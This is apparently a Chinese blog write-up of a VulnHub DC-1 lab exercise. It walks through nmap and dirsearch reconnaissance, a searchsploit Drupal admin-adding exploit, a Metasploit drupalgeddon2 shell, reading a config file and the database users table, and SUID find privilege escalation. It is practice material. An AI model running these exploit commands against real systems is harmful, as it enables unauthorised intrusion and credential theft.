DC-1靶机

已于 2023-12-12 14:15:02 修改
阅读量197 收藏 1
点赞数 4
文章标签: 安全
于 2023-11-26 00:36:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80203701/article/details/134621185
版权

记录自己打DC-1的过程,也算是自己的一个笔记吧。(写的有点乱佬轻点喷)打靶的思路和命令是参考大师傅红队笔记。

工具:kali2023

目录

靶机下载 

环境的搭建

一、信息收集阶段

1、使用nmap进行信息收集 

二、常规的扫描

1.常规的端口扫描

2.漏洞的探测

3.网站目录的扫描

4.打开靶机的80端口地址

5.drupal漏洞查找

三、利用漏洞进行提权

 连接数据库

靶机下载 

官方地址 https://download.vulnhub.com/dc/DC-1.zip

环境的搭建

下载后dc-1导入VMwave中,个人比较喜欢用NAT模式(主要是可以方便在里面查资料......)

 kali ip:192.168.234.152                     

一、信息收集阶段

1、使用nmap进行信息收集 

nmap -sn 192.168.234.0/24

 明显看到192.168.234.146为新增加的IP应该就是DC-1的靶机IP地址

二、常规的扫描

1.常规的端口扫描

sudo nmap -sV -O -p- --min-rate 10000 192.168.234.146 -oA nmapscan/ports

 参数解释

-sV                                              探测目标对象开放的服务

-O                                               探测目标对象的操作系统

-p-                                               探测目标开放的所有端口

--min-rate  10000                        以10000的速率进行扫描

-oA                                              将结果全格式的保存到ports中

可以看到开放的有22,80,111,49588 端口 一般来说80是主要的突破口22是次要的另外的那两个我也不是很清楚(还是了解的少)

2.漏洞的探测

sudo nmap --script=vuln -p22,80,111,49588 192.168.234.146 -oA nmapscan/vuln

 这个扫描会有点慢................

扫描结束后好像也没有什么特别有用的信息,但是常规的扫描还是要继续进行的。 

3.网站目录的扫描

(个人比较喜欢dirsearch这个比较快)

dirsearch -u http://192.168.234.146 -x300,301,302,304,303,400,401,402,403,404,500,501

这里由于命令太长写不下了就没有继续写下去dirsearch中的-x参数可以过滤无用的响应包我们需要的只是20开头的。(有时候不需要)

 我们需要重点关注/user/login这个目录。

4.打开靶机的80端口地址

 这里推荐大家下载一叫Wappalyzer的插件可以帮我们探测网站详细的内容,可以看到这个网站是Drupal的CMS(一般的cms都有漏洞可以利用)这样我们的目标就很清晰了查看drupal有什么漏洞可以利用。

5.drupal漏洞查找

sudo searchsploit drupal 7

我们不知道密码进不去网站的后台可以看到扫出来的漏洞有个admin增加py脚本,把这个脚本给保存下来。

sudo searchsploit drupal 7 -m 34992.py

 

 vi打开这个py脚本看看里面的内容。

三、利用漏洞进行提权

可以看到给我们的利用方法 

sudo python2 34992.py -t http://192.168.234.146 -u admin2 -p admin2

 

 进入后台我们发现有个flag3

 提示我们去看passwd和shadow(看到这我才发现忘记msfconsole这个工具getshell了)

use exploit/unix/webapp/drupal_drupalgeddon2  或者 use 1

show options

set rhosts 192.168.234.146

 

 只要是在Required中为yes都是需要我们设置参数的 (Rhosts 是我们被攻击机的IP也就是dc-1的IP)。

 芜湖~获得立足点开始提权!

进一步获得连接性更好的shell。

shell

python -c 'import pty;pty.spawn("/bin/bash")';

看见一个flag1.txt文件打开后提示  Every good CMS needs a config file - and so do you.我们去找默认的配置文件。

cd /sites/default

cat settings.php

flag2找到了提示我们提升root权限或者直接爆破 ,那就先连接一下看看。

 连接数据库

然后就是简单查表

show databses;                                                #查数据库

use drupaldb;                                                   #进入这个库

show tables;                                                     #查表

select * from users;                                          #查这个表中的所有字段

 

有的时候就很邪门明明一样的命令就是一个报错一个可以正常执行(可能是我太倒霉了.......)

因为咱们第一步利用脚本获得了一个admin权限的用户,这里就不重复了(其实这里还有一种获得admin权限的方法可是我太懒了。)

继续接着flag3的提示 需要我们看passwd和shadow。

 找到一个flag4 那就进到这个目录下

 提示我们用find进行提权操作

find / -perm -4000 2>/dev/null

进一步确定使用find提权 

这里给大家推荐一个提权网站   https://gtfobins.github.io/

 

 

 进入root目录看到有最后一个flag

至此结束! 

Sunhaom1
关注
  • 4
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
复现DC-1靶机.pdf
03-22
复现DC-1靶机.pdf
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
DC-4靶机提权超详细过程
02-29
### DC-4靶机提权超详细过程 #### 一、前言 本文将详细介绍如何在DC-4靶机上进行权限提升的过程,包括利用Kali Linux进行初始渗透测试、爆破登录凭证、获取敏感信息以及最终实现权限提升的具体步骤。通过本教程,...
dc-4靶机练习.docx
01-02
靶机在web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新用户的登陆口令。 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有...
Linux安全与高级应用(四)深入探索MySQL数据库:安装、管理与安全实践
洛秋的博客
08-07 1492
Linux:作为操作系统,提供稳定的运行环境。Apache:作为Web服务器,处理HTTP请求。MySQL:作为数据库管理系统,存储和管理数据。:作为脚本语言,生成动态网页。LAMP平台的优势在于其成本低廉、可定制性强、易于开发、方便易用且安全稳定。这使得LAMP成为许多企业和开发者的首选平台。通过以上步骤,我们完成了LAMP平台的部署及其主要组件的配置和测试。LAMP平台的搭建不仅为Web开发提供了一个强大的环境,同时也展现了其在成本和效率上的优势。
DLMS/COSEM中的信息安全安全密钥(中)
huaqianzkh的专栏
08-09 660
PKI是安全基础设施它创造和管理公钥证书以便于使用公钥(即非对称密钥)加密。为了实现这一目标,PKI需要执行两个基本任务:a)验证绑定的准确性后,生成和分发公钥证书将公钥绑定到其他信息;b)维护和分发未到期证书的证书状态信息。对于DLMS/COSEM,可以预料分层PKI包括如图23所示的以下组件。——根证书机构(Root-CA);——证书机构/下属机构(Sub-CA);——终端实体:不颁发证书的实体:DLMS/COSEM客户机,DLMS/COSEM服务器和第三方。
如何确保场外个股期权交易的安全
Lunasi的博客
08-07 218
只选择那些拥有合法金融牌照、受到监管机构严格监督的平台进行交易,确保在中国交易时,平台已获得证监会或相关金融监管机构的批准。:深入学习期权的基础知识,包括不同类型的期权、它们的权利和义务、定价方式以及风险特性,从而提升自我保护的能力。:在交易前,深入分析市场趋势和相关股票的基本面,评估潜在风险,并制定相应的风险管理策略。通过这些措施,投资者可以在场外个股期权交易中提高交易的安全性,有效降低不必要的风险。:选择流动性好的期权进行交易,以便在需要时能快速买卖,减少因流动性不足带来的风险。
Linux安全与高级应用(十一)Linux防火墙策略中的SNAT与DNAT应用解析
最新发布
洛秋的博客
08-12 598
SNAT和DNAT策略在Linux防火墙配置中占据着重要地位,它们不仅解决了网络地址转换的问题,还为网络安全提供了多层次的防护手段。在企业网络环境中,合理运用SNAT与DNAT策略,可以有效提升网络资源的利用率,同时大大增强网络的安全性。随着网络技术的不断发展,防火墙策略也将更加复杂和多样化,SNAT和DNAT将继续在网络安全领域发挥重要作用。掌握和灵活运用这些策略,将有助于应对未来网络安全中的各种挑战。
Linux系统安全及应用(二):PAM安全认证
shyuu的博客
08-12 673
Linux系统安全及应用(二),详解PAM安全认证
自学黑客(网络安全
热门推荐
2301_77160226的博客
08-05 2万+
想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
CVE-2024-38077:Windows远程桌面授权服务的‘隐形杀手’——深度剖析与紧急防护策略
超哥的博客
08-12 876
CVE-2024-38077:Windows远程桌面授权服务的‘隐形杀手’——深度剖析与紧急防护策略1 漏洞描述2 漏洞影响2.1 处置优先级:高2.2 影响版本3 漏洞检测3.1 漏洞检测工具3.2
【Linux 从基础到进阶】SELinux 与 AppArmor 安全模块配置
weixin_39372311的博客
08-07 895
SELinux(Security-Enhanced Linux)是由美国国家安全局(NSA)开发的安全模块,通过强制访问控制策略来保护系统。它基于安全策略的定义,限制进程对系统资源的访问。AppArmor(Application Armor)是一个安全模块,通过定义应用程序的安全策略来限制其行为。它使用配置文件(profile)来描述进程对文件、网络和其他资源的访问权限。通过本文的介绍,您已经了解了 SELinux 和 AppArmor 的基本概念、安装和配置方法。
英特尔凌动® P5300 和 P5700 处理器使企业能够优化现代网络基础架构、安全加速器和存储设备之间的性能和成本平衡。
Mandy_mjd的博客
08-07 905
英特尔凌动® P 处理器专为满足 5G 要求严苛的吞吐量、功耗、环境和延迟需求而设计。
加密软件有哪些常见的安全特性
shunyou0526的博客
08-07 332
核心功能:加密软件的核心在于对数据进行加密处理,通过复杂的加密算法(如AES、RSA等)将明文数据转换为密文,确保数据在存储和传输过程中的安全性。透明加密:部分加密软件支持透明加密功能,即用户在保存文件时数据会自动加密,打开文件时自动解密,无需用户手动操作,提高了使用的便捷性。灵活配置:加密软件通常提供多种加密模式供用户选择,如透明加密、智能加密、只解密不加密等,以满足不同场景下的加密需求。身份认证:在访问加密数据前,用户需要进行身份认证,如输入密码、使用生物识别技术等,以验证用户的身份和权限。
硬盘文件数据销毁|文件销毁|硬盘销毁|数据销毁|中国成就的伟大与数据安全在新时代国家安全中的关键作用
2301_79618370的博客
08-09 356
而在新时代,保障数据安全是维护国家安全的重要任务,需要我们共同努力,筑牢国家安全的防线,为实现中华民族伟大复兴的中国梦创造更加安全稳定的环境。在当今世界,中国的发展成就举世瞩目,但令人惊讶的是,大多数人可能并未充分意识到其伟大之处。与此同时,数据安全作为国家安全的重要组成部分,其重要性在新时代愈发凸显。高铁技术的领先,5G 通信的突破,以及航天领域的一系列成就,如嫦娥探月、天问一号火星探测等,都彰显了中国在科技前沿的实力。强化企业的数据安全责任,提高全社会的数据安全意识,形成共同维护数据安全的良好氛围。
跨域:安全分步实施指南
Aurelius Shu
08-10 911
在前后端分离的 Web 服务架构中,跨域问题是一个常见的问题。通过在网关层集中管理跨域配置,可以有效地简化跨域问题的处理,同时确保系统安全和灵活性。
住宅代理和数据中心代理:指纹浏览器用哪个更安全
foxyfoxy123的博客
08-08 817
在当今的数字时代,确保您的在线安全至关重要。这就是住宅和数据中心代理发挥作用的地方,它们可以保护您的身份和个人信息。指纹浏览器解决了账号所在环境指纹参数隔离的安全问题,而IP解决环境的定位与隔离问题
浙江省“全省敏感数据安全保护与保密治理重点实验室” 获批认定!
美创科技的博客
08-07 399
全省敏感数据安全保护与保密治理重点实验室,由国家万人计划科技创新领军人才樊凌雁教授担任实验室主任,聚焦自主安全可控的芯片底座、云网端一体化安全防护体系、敏感数据安全共享等三大关键科技问题,针对关键信息基础设施中敏感数据的泄密风险,从“芯云网边端”五个维度,开展安全芯片与密码技术、云网端智能系统安全以及信息内容安全与保密等基础性、系统性、关键性理论与技术研究,致力于为国家和浙江省关键信息基础设施敏感数据安全保护提供有力支撑。近日,浙江省科学技术厅正式公布2023年第二批全省重点实验室认定结果。
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值